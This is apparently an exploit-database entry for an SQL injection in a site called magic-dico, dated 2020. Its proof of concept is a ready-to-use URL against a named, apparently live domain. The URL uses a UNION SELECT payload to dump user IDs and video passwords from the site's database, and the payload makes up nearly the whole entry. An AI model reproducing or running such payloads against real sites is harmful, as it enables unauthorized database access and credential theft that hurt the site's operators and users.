-------------------------------------------------------------*
#Exploit Title: magic-dico - SQL Injection vulnerability
#Date: 2020-11-11
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://www.magic-dico.co.il/magic.php?id=-545%27%20union%20select%201,2,3,4,5,6,7,unhex(hex(group_concat(realID,wpID,videoPassword))),9,10,11,12,13%20from%20magics%20--+
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*